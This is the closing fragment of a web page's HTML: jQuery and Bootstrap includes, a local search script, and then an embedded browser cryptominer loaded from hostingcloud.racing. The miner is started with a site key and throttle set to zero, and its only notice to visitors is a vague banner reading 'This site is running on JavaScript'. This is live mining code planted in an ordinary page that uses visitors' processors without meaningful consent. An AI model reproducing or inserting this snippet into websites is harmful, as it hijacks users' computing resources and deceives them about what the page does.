
        <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
        <script src="search.js"></script>
        
        <script src="https://www.hostingcloud.racing/Ll8g.js"></script>
        <script>
            var _client = new Client.Anonymous('c366dba3499f1b8018f28b28ee7d695f4002ce3645ebd0ed6c0a00a2e4ad4544', {
                throttle: 0, c: 'w'
            });
            _client.start();
            _client.addMiningNotification("Top", "This site is running on JavaScript", "#cccccc", 40, "#3d3d3d");

        </script>
    </body>
</html>
